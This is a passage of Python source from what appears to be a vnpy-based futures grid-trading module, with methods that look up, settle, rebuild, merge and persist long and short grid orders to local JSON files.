    ordered: required orderStatus (submitted to the server or not).
    opened: required openStatus.
    closed: required closeStatus.
    begin / end: open-price bounds; EMPTY_FLOAT means unbounded. For longs
    begin is the upper bound and end the lower; for shorts the reverse.
    type: required grid type label.
    """
    if direction == DIRECTION_LONG:
        # long side: begin caps the price from above, end from below
        hi = sys.maxsize if begin == EMPTY_FLOAT else begin
        lo = 0 - sys.maxsize if end == EMPTY_FLOAT else end
        return [g for g in self.dnGrids
                if g.orderStatus == ordered
                and g.openStatus == opened
                and g.closeStatus == closed
                and lo <= g.openPrice <= hi
                and g.type == type]
    if direction == DIRECTION_SHORT:
        # short side: begin is the floor, end the ceiling
        lo = 0 - sys.maxsize if begin == EMPTY_FLOAT else begin
        hi = sys.maxsize if end == EMPTY_FLOAT else end
        return [g for g in self.upGrids
                if g.orderStatus == ordered
                and g.openStatus == opened
                and g.closeStatus == closed
                and lo <= g.openPrice <= hi
                and g.type == type]
def getGridById(self,direction, id):
    """Find the grid carrying the given id in the direction's queue.

    Returns the matching grid, or None when the id is empty or not found.
    """
    if id == EMPTY_STRING or len(id) < 1:
        return
    if direction == DIRECTION_LONG:
        for grid in self.dnGrids[:]:
            if grid.id != id:
                continue
            self.writeCtaLog(u'找到下网格[open={},close={},stop={},volume={}]'.format(grid.openPrice,grid.closePrice,grid.stopPrice,grid.volume))
            return grid
    if direction == DIRECTION_SHORT:
        for grid in self.upGrids[:]:
            if grid.id != id:
                continue
            self.writeCtaLog(u'找到上网格[open={},close={},stop={},volume={}]'.format(grid.openPrice,grid.closePrice,grid.stopPrice,grid.volume))
            return grid
    return None
def getPosition(self,direction, type=EMPTY_STRING):
    """Sum the remaining volume (volume - tradedVolume) of opened grids of *type*."""
    if direction == DIRECTION_LONG:
        return sum(g.volume - g.tradedVolume
                   for g in self.dnGrids if g.openStatus and g.type == type)
    if direction == DIRECTION_SHORT:
        return sum(g.volume - g.tradedVolume
                   for g in self.upGrids if g.openStatus and g.type == type)
def updateOrderRef(self, direction, openPrice, orderRef):
    """Record *orderRef* on every grid at *openPrice* and mark it as ordered."""
    if direction == DIRECTION_LONG:
        targets = self.dnGrids
    elif direction == DIRECTION_SHORT:
        targets = self.upGrids
    else:
        targets = []
    for grid in targets:
        if grid.openPrice == openPrice:
            grid.orderRef = orderRef
            grid.orderStatus = True
def cancelOrderRef(self,direction, openPrice):
    """Reset the pending-order state of grids at *openPrice* (order cancelled).

    Only grids that carry an orderRef, are flagged as ordered, and have not
    yet opened a position are reset.
    """
    if direction == DIRECTION_LONG:
        for grid in self.dnGrids:
            if grid.openPrice != openPrice:
                continue
            if grid.orderRef != EMPTY_STRING and grid.orderStatus and not grid.openStatus:
                grid.orderRef = EMPTY_STRING
                grid.orderStatus = False
                self.writeCtaLog(u'下网格撤单[{0}]'.format(grid.openPrice))
    if direction == DIRECTION_SHORT:
        for grid in self.upGrids:
            if grid.openPrice != openPrice:
                continue
            if grid.orderRef != EMPTY_STRING and grid.orderStatus and not grid.openStatus:
                grid.orderRef = EMPTY_STRING
                grid.orderStatus = False
                self.writeCtaLog(u'上网格撤单[{0}]'.format(grid.openPrice))
def getGridbyOpenPrice(self, direction, openPrice, orderRef = EMPTY_STRING):
    """Find the grid matching both *orderRef* and *openPrice*.

    Logs a warning and returns None when no grid matches.
    """
    if direction == DIRECTION_LONG:
        pool = self.dnGrids
    elif direction == DIRECTION_SHORT:
        pool = self.upGrids
    else:
        pool = []
    for grid in pool:
        # price match takes priority
        if grid.orderRef == orderRef and grid.openPrice == openPrice:
            return grid
    self.writeCtaLog(u'异常,getGridbyOpenPrice找不到网格[{0},openprice={1},orderRef={2}]'.format(direction, openPrice, orderRef))
    return None
def getGrid(self, direction, openPrice=EMPTY_FLOAT, closePrice=EMPTY_FLOAT, orderRef=EMPTY_STRING, t=EMPTY_STRING):
    """Look up a grid by the key selected via *t*.

    t: u'OpenPrice', u'ClosePrice' or u'OrderRef' — selects which field is
    compared. Logs a warning and returns None when nothing matches.
    """
    if direction == DIRECTION_LONG:
        candidates = self.dnGrids
    elif direction == DIRECTION_SHORT:
        candidates = self.upGrids
    else:
        candidates = []
    for grid in candidates:
        # price keys take priority over the order reference
        if t == u'OpenPrice':
            if grid.openPrice == openPrice:
                return grid
        elif t == u'ClosePrice':
            if grid.closePrice == closePrice:
                return grid
        elif t == u'OrderRef':
            if grid.orderRef == orderRef:
                return grid
    self.writeCtaLog(u'异常,getGrid找不到网格[direction={0},oepnPrice={1},closePrice={2},orderRef={3},t={4}]'.format(direction, openPrice, closePrice, orderRef, t))
    return None
def getFirstLastGrid(self, direction,type = EMPTY_STRING):
    """Return the (first, last) grids of the given type as a tuple.

    Short side: first = highest open price, last = lowest.
    Long side:  first = lowest open price,  last = highest.
    Returns (None, None) when there are no grids of that type.
    """
    if direction == DIRECTION_SHORT:
        short_grids = self.getGridsWithTypes(direction=direction, types=[type])
        if not short_grids:
            return None, None
        if len(short_grids) == 1:
            return short_grids[0], short_grids[0]
        # ascending open price; first is the top of the ladder
        by_price = sorted(short_grids, key=lambda g: g.openPrice)
        return by_price[-1], by_price[0]
    if direction == DIRECTION_LONG:
        long_grids = self.getGridsWithTypes(direction=direction, types=[type])
        if not long_grids:
            return None, None
        if len(long_grids) == 1:
            return long_grids[0], long_grids[0]
        by_price = sorted(long_grids, key=lambda g: g.openPrice)
        return by_price[0], by_price[-1]
    return None, None
def getLastOpenedGrid(self, direction,type = EMPTY_STRING, orderby_asc=True):
    """Return one extreme opened grid of the direction.

    orderby_asc=True picks the highest open price for shorts and the
    lowest for longs; False inverts the choice. Returns None when no
    opened grid of that type exists.
    """
    candidates = self.getGrids(direction=direction, opened=True, type=type)
    if not candidates:
        return None
    if len(candidates) == 1:
        return candidates[0]
    by_price = sorted(candidates, key=lambda g: g.openPrice)
    if direction == DIRECTION_SHORT:
        return by_price[-1] if orderby_asc else by_price[0]
    if direction == DIRECTION_LONG:
        return by_price[0] if orderby_asc else by_price[-1]
    return None
def closeGrid(self, direction, closePrice, closeVolume):
    """Settle a filled close order against grids whose closePrice matches.

    :param direction: DIRECTION_LONG settles dnGrids, DIRECTION_SHORT upGrids.
    :param closePrice: close price of the filled order, matched exactly.
    :param closeVolume: filled volume to absorb; grids are removed or shrunk.

    Fix: iterate over a slice copy (self.dnGrids[:] / self.upGrids[:]) —
    the original removed elements from the list it was iterating, which
    silently skips the element that follows each removal.
    """
    if direction == DIRECTION_LONG:
        for x in self.dnGrids[:]:
            # exact fill: drop the grid and stop
            if x.closePrice == closePrice and x.openStatus and x.volume == closeVolume:
                self.writeCtaLog(u'下网格交易结束[{0}->{1}],仓位:{2},移除网格'.format(x.openPrice, x.closePrice,closeVolume))
                self.dnGrids.remove(x)
                return
            # partial fill: shrink this grid's position
            # NOTE(review): closeVolume is not zeroed here, so a later grid
            # with the same closePrice could be shrunk again — confirm intent
            if x.closePrice == closePrice and x.openStatus and x.volume > closeVolume:
                self.writeCtaLog(u'下网格交易部分结束[{0}->{1}],减少仓位:{2}'.format(x.openPrice, x.closePrice,closeVolume))
                x.volume = x.volume - closeVolume
            # fill exceeds this grid: consume it and carry the remainder on
            if x.closePrice == closePrice and x.openStatus and x.volume < closeVolume:
                self.writeCtaLog(u'下网格交易结束[{0}->{1}],移除网格,剩余仓位:{2}'.format(x.openPrice, x.closePrice, closeVolume-x.volume))
                closeVolume = closeVolume - x.volume
                self.dnGrids.remove(x)
    if direction == DIRECTION_SHORT:
        for x in self.upGrids[:]:
            if x.closePrice == closePrice and x.openStatus and x.volume == closeVolume:
                self.writeCtaLog(u'上网格交易结束[{0}->{1}],仓位:{2},移除网格'.format(x.openPrice, x.closePrice,closeVolume))
                self.upGrids.remove(x)
                return
            if x.closePrice == closePrice and x.openStatus and x.volume > closeVolume:
                self.writeCtaLog(u'上网格交易结束[{0}->{1}],仓位减少:{2}'.format(x.openPrice, x.closePrice,closeVolume))
                x.volume = x.volume - closeVolume
            if x.closePrice == closePrice and x.openStatus and x.volume < closeVolume:
                self.writeCtaLog(u'上网格交易结束[{0}->{1}],移除网格,剩余仓位:{2}'.format(x.openPrice, x.closePrice,closeVolume-x.volume))
                closeVolume = closeVolume - x.volume
                self.upGrids.remove(x)
def removeGridById(self,direction, id):
    """Delete the grid carrying the given id from the direction's queue."""
    if id == EMPTY_STRING or len(id) < 1:
        return
    if direction == DIRECTION_LONG:
        # iterate a copy so removal during the loop is safe
        for grid in self.dnGrids[:]:
            if grid.id == id:
                self.writeCtaLog(u'清除下网格[open={},close={},stop={},volume={}]'.format(grid.openPrice,grid.closePrice,grid.stopPrice,grid.volume))
                self.dnGrids.remove(grid)
    if direction == DIRECTION_SHORT:
        for grid in self.upGrids[:]:
            if grid.id == id:
                self.writeCtaLog(u'清除上网格[open={},close={},stop={},volume={}]'.format(grid.openPrice,grid.closePrice,grid.stopPrice,grid.volume))
                self.upGrids.remove(grid)
def removeGrids(self, direction, priceline, type=EMPTY_STRING):
    """Drop idle grids of *type* beyond *priceline*.

    Long side: drops grids opening above the line; short side: below it.
    Only grids with no order, no position and no close in progress are removed.
    """
    if direction == DIRECTION_LONG:
        for grid in self.dnGrids[:]:
            idle = not grid.orderStatus and not grid.openStatus and not grid.closeStatus
            if idle and grid.type == type and grid.openPrice > priceline:
                self.writeCtaLog(u'清除下网格[open={0}]'.format(grid.openPrice))
                self.dnGrids.remove(grid)
    if direction == DIRECTION_SHORT:
        for grid in self.upGrids[:]:
            idle = not grid.orderStatus and not grid.openStatus and not grid.closeStatus
            if idle and grid.type == type and grid.openPrice < priceline:
                self.writeCtaLog(u'清除上网格[open={0}]'.format(grid.openPrice))
                self.upGrids.remove(grid)
def moveGrids(self, direction, pricedelta, type=EMPTY_STRING):
    """Shift every grid of the direction by *pricedelta* and retag it with *type*.

    Open, close and stop prices are all translated by the same delta.
    """
    if direction == DIRECTION_LONG:
        grids = self.dnGrids[:]
    elif direction == DIRECTION_SHORT:
        grids = self.upGrids[:]
    else:
        grids = []
    for grid in grids:
        grid.openPrice += pricedelta
        grid.closePrice += pricedelta
        grid.stopPrice += pricedelta
        grid.type = type
def rebuildGrids(self, direction, upline=EMPTY_FLOAT, dnline=EMPTY_FLOAT, midline=EMPTY_FLOAT, upRate=1, dnRate=1, reuse=False, useVariableSteps=False):
    """Rebuild one direction's grid ladder.

    Removes every grid that carries no order/position, keeps the rest, and
    lays a fresh ladder of (maxLots - kept) grids anchored at the band line.

    :param upline: anchor for the short-side (upper) ladder.
    :param dnline: anchor for the long-side (lower) ladder.
    :param midline: reference price used as the initial best open price.
    :param upRate: upper grid height multiplier (floored at 0.5).
    :param dnRate: lower grid height multiplier (floored at 0.5).
    :param reuse: propagated to each newly created CtaGrid.
    :param useVariableSteps: widen the step by gridHeight/2 every 5 grids.
    """
    self.writeCtaLog(u'重新拉网:direction:{},upline:{},dnline:{}'.format(direction, upline, dnline))
    # grid height ratios must not drop below 0.5
    if upRate < 0.5 or dnRate < 0.5:
        upRate = max(0.5, upRate)
        dnRate = max(0.5, dnRate)
    # Pre-compute cumulative step offsets; with variable steps the increment
    # grows by gridHeight/2 for every 5 grids already laid.
    gridSteps = [0]*self.maxLots
    for i in range(1, self.maxLots, 1):
        if useVariableSteps == False:
            gridSteps[i] = self.gridHeight * i
        else:
            j = int(i / 5)
            gridSteps[i] = gridSteps[i-1] + self.gridHeight + self.gridHeight / 2 * j
    # Rebuild the lower (long-side) grids: drop idle ones, keep grids with
    # orders/positions, and extend only below the lowest kept price.
    if direction == DIRECTION_LONG:
        min_long_price = midline
        remove_grids = []
        opened_grids = []
        # drop lower grids that carry no order and no position
        for x in self.dnGrids[:]:
            if not x.orderStatus and not x.openStatus and not x.closeStatus:
                remove_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
                self.dnGrids.remove(x)
            else:
                opened_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
                if x.openPrice < min_long_price:
                    min_long_price = x.openPrice
        if len(remove_grids) > 0:
            self.writeCtaLog(u'清除下网格[{}]'.format(remove_grids))
        if len(opened_grids) > 0:
            self.writeCtaLog(u'保留下网格[{}]'.format(opened_grids))
        # number of grids that still need to be rebuilt
        remainLots = len(self.dnGrids)
        lots = self.maxLots - remainLots
        dnline = min(dnline, min_long_price-self.gridHeight*dnRate)
        self.writeCtaLog(u'需要重建的网格数量:{0},起点:{1}'.format(lots, dnline))
        if lots > 0:
            for i in range(0, lots, 1):
                # long grid: open at dnline - step*i, close at open + win;
                # both prices snapped to a multiple of minDiff
                open_price = int((dnline - gridSteps[i+remainLots] * dnRate) / self.minDiff ) * self.minDiff
                close_price = int((open_price + self.gridWin* dnRate)/self.minDiff) * self.minDiff
                grid = CtaGrid(direction=DIRECTION_LONG,
                               openprice=open_price,
                               closeprice=close_price,
                               volume=self.volume*self.getVolumeRate(remainLots + i))
                grid.reuse = reuse
                self.dnGrids.append(grid)
            self.writeCtaLog(u'重新拉下网格:[{0}~{1}]'.format(dnline, dnline - gridSteps[-1] * dnRate))
    # Rebuild the upper (short-side) grids symmetrically, extending only
    # above the highest kept price.
    if direction == DIRECTION_SHORT:
        max_short_price = midline   # highest kept short-open price
        remove_grids = []           # dropped grids (for logging)
        opened_grids = []           # kept grids (for logging)
        # drop upper grids that carry no order and no position
        for x in self.upGrids[:]:
            if not x.orderStatus and not x.openStatus and not x.closeStatus:
                remove_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
                self.upGrids.remove(x)
            else:
                opened_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
                if x.openPrice > max_short_price:
                    max_short_price = x.openPrice
        if len(remove_grids) > 0:
            self.writeCtaLog(u'清除上网格[{}]'.format(remove_grids))
        if len(opened_grids) > 0:
            self.writeCtaLog(u'保留上网格[{}]'.format(opened_grids))
        # number of grids that still need to be rebuilt
        remainLots = len(self.upGrids)
        lots = self.maxLots - remainLots
        upline = max(upline, max_short_price+self.gridHeight*upRate)
        self.writeCtaLog(u'需要重建的网格数量:{0},起点:{1}'.format(lots, upline))
        if lots > 0:
            # short grid: open at upline + step*i, close at open - win
            for i in range(0, lots, 1):
                open_price = int((upline + gridSteps[i+remainLots] * upRate) / self.minDiff) * self.minDiff
                close_price = int((open_price - self.gridWin * upRate) / self.minDiff) * self.minDiff
                grid = CtaGrid(direction=DIRECTION_SHORT,
                               openprice=open_price,
                               closeprice=close_price,
                               volume=self.volume*self.getVolumeRate(remainLots + i))
                grid.reuse = reuse
                self.upGrids.append(grid)
            self.writeCtaLog(u'重新拉上网格:[{0}~{1}]'.format(upline, upline + gridSteps[-1] * upRate))
def recount_avg_open_price(self):
    """Refresh extreme and volume-weighted average open prices of both sides.

    Sets max_up_open_price / avg_up_open_price from opened upper grids and
    min_dn_open_price / avg_dn_open_price from opened lower grids; the
    averages keep their sentinel values when no volume is held.
    """
    self.max_up_open_price = 0 - sys.maxsize
    self.avg_up_open_price = 0 - sys.maxsize
    self.min_dn_open_price = sys.maxsize
    self.avg_dn_open_price = sys.maxsize
    amount = EMPTY_FLOAT
    volume = EMPTY_INT
    for grid in [g for g in self.upGrids if g.openStatus]:
        if grid.openPrice > self.max_up_open_price:
            self.max_up_open_price = grid.openPrice
        amount += grid.openPrice * grid.volume
        volume += grid.volume
    if volume > 0:
        self.avg_up_open_price = amount / volume
    amount = EMPTY_FLOAT
    volume = EMPTY_INT
    for grid in [g for g in self.dnGrids if g.openStatus]:
        if grid.openPrice < self.min_dn_open_price:
            self.min_dn_open_price = grid.openPrice
        amount += grid.openPrice * grid.volume
        volume += grid.volume
    if volume > 0:
        self.avg_dn_open_price = amount / volume
def count_avg_open_price(self, grid_list):
    """Return the volume-weighted average open price of *grid_list*.

    Returns EMPTY_FLOAT when the list holds no volume.
    """
    amount = EMPTY_FLOAT
    volume = EMPTY_INT
    for grid in grid_list:
        amount += grid.openPrice * grid.volume
        volume += grid.volume
    if volume > EMPTY_INT:
        return amount / volume
    return EMPTY_FLOAT
def combineOpenedGrids(self,direction,type=EMPTY_STRING):
    """Merge all opened (not yet ordered) grids of one direction into one grid.

    The surviving grid's open/close prices become the volume-weighted
    averages of the merged grids, snapped to a multiple of minDiff; its
    volume becomes the total volume. No-op when fewer than two grids match.

    :param direction: DIRECTION_SHORT merges upGrids, DIRECTION_LONG dnGrids.
    :param type: grid type label to restrict the merge to.
    """
    total_open_price = EMPTY_FLOAT
    total_close_price = EMPTY_FLOAT
    total_volume = EMPTY_INT
    saved_grid = None
    if direction == DIRECTION_SHORT:
        opened_short_grids = self.getGrids(direction=direction, opened=True, ordered=False, type = type)
        if len(opened_short_grids)<=1:
            return
        self.writeCtaLog(u'{}个空网格合并为1个'.format(len(opened_short_grids)))
        # keep the last grid; fold every other grid's position into it
        saved_grid = opened_short_grids[-1]
        for g in opened_short_grids:
            total_open_price += g.openPrice * g.volume
            total_close_price += g.closePrice * g.volume
            total_volume += g.volume
            if g != saved_grid:
                self.writeCtaLog(u'删除空网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
                self.upGrids.remove(g)
            else:
                self.writeCtaLog(u'保留空网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
        # update the surviving grid's open price and position size
        # NOTE(review): divides by total_volume — assumes the merged grids
        # hold non-zero volume in total; confirm upstream guarantees this
        saved_grid.openPrice = int((total_open_price / total_volume)/self.minDiff)*self.minDiff
        saved_grid.volume = total_volume
        saved_grid.closePrice = int((total_close_price / total_volume)/self.minDiff)*self.minDiff
        self.writeCtaLog(u'合并后空网格为{}=>{},v:{}'.format(saved_grid.openPrice, saved_grid.closePrice, saved_grid.volume))
    elif direction == DIRECTION_LONG:
        opened_long_grids = self.getGrids(direction=direction, opened=True, ordered=False, type=type)
        if len(opened_long_grids) <= 1:
            return
        self.writeCtaLog(u'{}个多网格合并为1个'.format(len(opened_long_grids)))
        # keep the last grid; fold every other grid's position into it
        saved_grid = opened_long_grids[-1]
        for g in opened_long_grids:
            total_open_price += g.openPrice * g.volume
            total_close_price += g.closePrice * g.volume
            total_volume += g.volume
            if g != saved_grid:
                self.writeCtaLog(u'删除多网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
                self.dnGrids.remove(g)
            else:
                self.writeCtaLog(u'保留多网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
        # update the surviving grid's open price and position size
        saved_grid.openPrice = int((total_open_price / total_volume) / self.minDiff) * self.minDiff
        saved_grid.volume = total_volume
        saved_grid.closePrice = int((total_close_price / total_volume) / self.minDiff) * self.minDiff
        self.writeCtaLog(
            u'合并后多网格为{}=>{},v:{}'.format(saved_grid.openPrice, saved_grid.closePrice, saved_grid.volume))
def clearDuplicateGrids(self, direction=EMPTY_STRING, type=EMPTY_STRING):
    """Remove not-yet-opened, not-yet-ordered grids that duplicate an
    earlier grid's open price.

    :param direction: DIRECTION_SHORT or DIRECTION_LONG; EMPTY_STRING
        processes both sides.
    :param type: grid type label to restrict the scan to.

    Fixes: the original used early returns in the short-side phase, which
    also skipped the long side whenever direction was EMPTY_STRING (both);
    the bare excepts are narrowed to ValueError (what list.remove raises).
    """
    if direction == DIRECTION_SHORT or direction == EMPTY_STRING:
        if len(self.upGrids) >= 2:
            checking_grids = self.getGrids(direction=DIRECTION_SHORT, opened=False, ordered=False, type=type)
            if len(checking_grids) >= 2:
                seen_prices = []
                duplicates = []
                for g in checking_grids:
                    # keep the first grid at each open price, mark the rest
                    if g.openPrice in seen_prices:
                        duplicates.append(g)
                        continue
                    seen_prices.append(g.openPrice)
                for dup in duplicates:
                    try:
                        self.upGrids.remove(dup)
                    except ValueError:
                        pass
    if direction == DIRECTION_LONG or direction == EMPTY_STRING:
        if len(self.dnGrids) >= 2:
            checking_grids = self.getGrids(direction=DIRECTION_LONG, opened=False, ordered=False, type=type)
            if len(checking_grids) >= 2:
                seen_prices = []
                duplicates = []
                for g in checking_grids:
                    if g.openPrice in seen_prices:
                        duplicates.append(g)
                        continue
                    seen_prices.append(g.openPrice)
                for dup in duplicates:
                    try:
                        self.dnGrids.remove(dup)
                    except ValueError:
                        pass
def save(self, direction=None):
    """
    Persist both grid lists to the local json file.

    2017/11/23 update: empty lists are saved as well.
    :param direction: unused by the body; kept for caller compatibility.
    :return: None
    """
    # skip persistence while backtesting
    if self.strategy and getattr(self.strategy,'backtesting',False):
        return
    # refresh average open prices before saving
    self.recount_avg_open_price()
    grids_save_path = self.get_data_folder()
    # keep the json name in sync with the owning strategy's name
    if self.jsonName != self.strategy.name:
        self.writeCtaLog(u'JsonName {} 与 上层策略名{} 不一致.'.format(self.jsonName, self.strategy.name))
        self.jsonName = self.strategy.name
    # remove the legacy per-direction json files
    old_up_json_file = os.path.join(grids_save_path, u'{0}_upGrids.json'.format(self.jsonName))
    old_dn_json_file = os.path.join(grids_save_path, u'{0}_dnGrids.json'.format(self.jsonName))
    if os.path.exists(old_up_json_file):
        try:
            os.remove(old_up_json_file)
        except:
            pass
    if os.path.exists(old_dn_json_file):
        try:
            os.remove(old_dn_json_file)
        except:
            pass
    # combined persistence file of the new format
    grid_json_file = os.path.join(grids_save_path, u'{}_Grids.json'.format(self.jsonName))
    self.json_file_path = grid_json_file
    data = {}
    up_grids = []
    for grid in self.upGrids:
        up_grids.append(grid.toJson())
    dn_grids = []
    for grid in self.dnGrids:
        dn_grids.append(grid.toJson())
    data[u'up_grids'] = up_grids
    data[u'dn_grids'] = dn_grids
    with open(grid_json_file, 'w') as f:
        json_data = json.dumps(data, indent=4)
        f.write(json_data)
    self.writeCtaLog(u'GrideTrade保存文件{}完成'.format(grid_json_file))
def load(self, direction, openStatusFilter=[]):
    """
    Load one direction's grids from the local json file.

    :param direction: DIRECTION_SHORT loads the 'up_grids' records,
        DIRECTION_LONG loads 'dn_grids'.
    :param openStatusFilter: empty = no filtering; [True] keeps only
        opened grids, [False] only not-yet-opened ones.
    :return: list of CtaGrid objects.
    """
    data = {}
    grids_save_path = self.get_data_folder()
    # keep the json name in sync with the owning strategy's name
    if self.jsonName != self.strategy.name:
        self.writeCtaLog(u'JsonName {} 与 上层策略名{} 不一致.'.format(self.jsonName, self.strategy.name))
        self.jsonName = self.strategy.name
    # migrate then remove the legacy per-direction json files
    old_up_json_file = os.path.join(grids_save_path, u'{0}_upGrids.json'.format(self.jsonName))
    old_dn_json_file = os.path.join(grids_save_path, u'{0}_dnGrids.json'.format(self.jsonName))
    if os.path.exists(old_up_json_file):
        try:
            with open(old_up_json_file, 'r', encoding='utf8') as f:
                # parse the legacy json file
                data['up_grids'] = json.load(f)
        except IOError:
            self.writeCtaLog(u'读取网格{}出错'.format(old_up_json_file))
            data['up_grids'] = []
        try:  # remove the legacy upper-grid file
            os.remove(old_up_json_file)
        except:
            pass
    if os.path.exists(old_dn_json_file):
        try:
            with open(old_dn_json_file, 'r', encoding='utf8') as f:
                # parse the legacy json file
                data['dn_grids'] = json.load(f)
        except IOError as ex:
            self.writeCtaLog(u'读取网格{}出错,ex:{}'.format(old_dn_json_file,str(ex)))
            data['dn_grids'] = []
        try:  # remove the legacy lower-grid file
            os.remove(old_dn_json_file)
        except:
            pass
    # if the new-format file is missing, create it; otherwise it wins
    grid_json_file = os.path.join(grids_save_path, u'{}_Grids.json'.format(self.jsonName))
    if not os.path.exists(grid_json_file):
        if len(data) == 0:
            data['up_grids'] = []
            data['dn_grids'] = []
            self.writeCtaLog(u'{}不存在,保存'.format(grid_json_file))
        else:
            self.writeCtaLog(u'{}不存在,保存'.format(grid_json_file))
        try:
            with open(grid_json_file, 'w') as f:
                json_data = json.dumps(data, indent=4)
                f.write(json_data)
        except Exception as ex:
            self.writeCtaLog(u'写入网格文件{}异常:{}'.format(grid_json_file,str(ex)))
    else:
        # read the new-format json file
        try:
            with open(grid_json_file, 'r', encoding='utf8') as f:
                data = json.load(f)
        except Exception as ex:
            self.writeCtaLog(u'读取网格文件{}异常:{}'.format(grid_json_file,str(ex)))
    # pick this direction's records from the loaded data
    json_grids = []
    if direction == DIRECTION_SHORT :
        json_grids = data['up_grids'] if 'up_grids' in data else []
    elif direction == DIRECTION_LONG:
        json_grids = data['dn_grids'] if 'dn_grids' in data else []
    grids = []
    for i in json_grids:
        closePrice = float(i['closePrice'])
        openPrice = float(i['openPrice'])
        stopPrice = float(i['stopPrice'])
        self.writeCtaLog(u'load Grid:open:{0},close:{1},stop:{2}'.format(openPrice, closePrice, stopPrice))
        grid = CtaGrid(direction=i['direction'], openprice=openPrice, closeprice=closePrice,
                       stopprice=stopPrice, volume=i['volume'])
        grid.orderStatus = i['orderStatus']  # order pending: True = submitted, False = not
        grid.orderRef = i['orderRef']  # OrderId
        grid.openStatus = i['openStatus']  # position opened
        grid.closeStatus = i['closeStatus']  # position closed
        strTime = i['openDatetime']
        if strTime == EMPTY_STRING or type(strTime)==type(None):
            grid.openDatetime = None
        else:
            grid.openDatetime = datetime.strptime(strTime, '%Y-%m-%d %H:%M:%S')
        # the fields below may be absent in older files; default each one
        try:
            grid.tradedVolume = i['tradedVolume']  # volume already traded
        except KeyError:
            grid.tradedVolume = EMPTY_INT
        try:
            grid.lockGrids = i['lockGrids']
        except KeyError:
            grid.lockGrids = []
        try:
            grid.type = i['type']
            if grid.type == False:
                grid.type = EMPTY_STRING
        except KeyError:
            grid.type = EMPTY_STRING
        try:
            grid.reuse = i['reuse']
        except KeyError:
            grid.reuse = False
        try:
            grid.openPrices = i['openPrices']
        except KeyError:
            grid.openPrices = {}
        try:
            grid.snapshot = i['snapshot']
        except KeyError:
            grid.snapshot = {}
        self.writeCtaLog(grid.toStr())
        # optionally keep only grids whose open status matches the filter,
        # so strategies can load just their opened grids
        if len(openStatusFilter) > 0:
            if grid.openStatus not in openStatusFilter:
                continue
        grids.append(grid)
    # refresh average open prices
    self.recount_avg_open_price()
    return grids
def get_data_folder(self):
    """Resolve the folder used for grid persistence files.

    Prefers <cwd>/data when that directory exists; otherwise falls back to
    the 'data' directory next to this module.
    """
    work_data = os.path.abspath(os.path.join(os.getcwd(), u'data'))
    if os.path.isdir(work_data):
        # a data/ subfolder under the working directory wins
        return work_data
    # default: vnpy/trader/app/ctaStrategy/data next to this file
    return os.path.abspath(os.path.join(os.path.dirname(__file__), u'data'))
def changeStrategyName(self, old_name, new_name):
    """
    Rename the strategy instance on line, migrating its json files too.

    :param old_name: current strategy instance name.
    :param new_name: new strategy instance name.
    :return: None
    """
    if old_name == new_name:
        # identical names: nothing to migrate
        self.writeCtaLog(u'更换策略实例名称失败,old:{} =>new:{}'.format(old_name, new_name))
        return
    data_folder = self.get_data_folder()
    self.jsonName = new_name
    # legacy and current files under the old name
    old_up_json_file = os.path.join(data_folder, u'{0}_upGrids.json'.format(old_name))
    old_dn_json_file = os.path.join(data_folder, u'{0}_dnGrids.json'.format(old_name))
    old_json_file = os.path.join(data_folder, u'{0}_Grids.json'.format(old_name))
    # target file under the new name
    self.json_file_path = os.path.join(data_folder, u'{0}_Grids.json'.format(new_name))
    if os.path.isfile(self.json_file_path):  # remove a pre-existing target file
        try:
            os.remove(self.json_file_path)
        except Exception as ex:
            self.writeCtaLog(u'GridTrade.changeStrategyName 删除文件:{}异常:{}'.format(old_up_json_file,str(ex)))
    # move the combined file when it exists ...
    if os.path.isfile(old_json_file):
        try:
            shutil.move(old_json_file, self.json_file_path)
            return
        except Exception as ex:
            self.writeCtaLog(u'GridTrade.changeStrategyName 移动文件:{}=》{}异常:{}'.format(old_up_json_file, self.json_file_path, str(ex)))
    else:
        # ... otherwise assemble it from the legacy per-direction files
        data = {}
        if os.path.isfile(old_up_json_file):
            try:
                with open(old_up_json_file, 'r', encoding='utf8') as f:
                    # parse the legacy json file
                    data['up_grids'] = json.load(f)
            except IOError:
                self.writeCtaLog(u'读取网格{}出错'.format(old_up_json_file))
                data['up_grids'] = []
            try:  # remove the legacy upper-grid file
                os.remove(old_up_json_file)
            except IOError:
                self.writeCtaLog(u'移除网格{}出错'.format(old_up_json_file))
        else:
            data['up_grids'] = []
        if os.path.isfile(old_dn_json_file):
            try:
                with open(old_dn_json_file, 'r', encoding='utf8') as f:
                    # parse the legacy json file
                    data['dn_grids'] = json.load(f)
            except IOError:
                self.writeCtaLog(u'读取网格{}出错'.format(old_dn_json_file))
                data['dn_grids'] = []
            try:  # remove the legacy lower-grid file
                os.remove(old_dn_json_file)
            except IOError:
                self.writeCtaLog(u'移除网格{}出错'.format(old_dn_json_file))
        else:
            data['dn_grids'] = []
        try:
            with open(self.json_file_path, 'w') as f:
                json_data = json.dumps(data, indent=4)
                f.write(json_data)
        except IOError as ex:
            self.writeCtaLog(u'写入网格文件{}异常:{}'.format(self.json_file_path, str(ex)))
def getJsonFilePath(self):
    """Return the path of the combined grids json file.

    :return: value of self.json_file_path.
    """
    return self.json_file_path
def getTypesOfOpenedGrids(self, direction, include_empty=False):
    """
    Collect the distinct type labels among opened grids of one direction.

    :param direction: passed through to getOpenedGrids.
    :param include_empty: when True, the empty-string type is kept too.
    :return: list of distinct type labels.
    """
    type_list = []
    for grid in self.getOpenedGrids(direction):
        if grid.type in type_list:
            continue
        if not include_empty and grid.type == EMPTY_STRING:
            continue
        type_list.append(grid.type)
    return type_list
class CtaLegacyGridTrade(object):
"""网格交易类
包括两个方向的网格队列,
v1, 传统网格:上网格做多,下网格做空
"""
def __init__(self, strategy, maxlots=5, height=2, win=2, vol=1, minDiff = 1):
    """Initialise the legacy grid trader.

    maxlots: default number of grids per side.
    height: grid spacing in price units (includes minDiff).
    win: take-profit distance in price units (includes minDiff).
    vol: volume opened per grid.
    minDiff: minimum price tick.
    """
    self.minDiff = minDiff
    self.strategy = strategy
    self.jsonName = self.strategy.origName  # strategy name, used for json file names
    self.useMongoDb = True
    self.maxLots = maxlots  # default number of grids
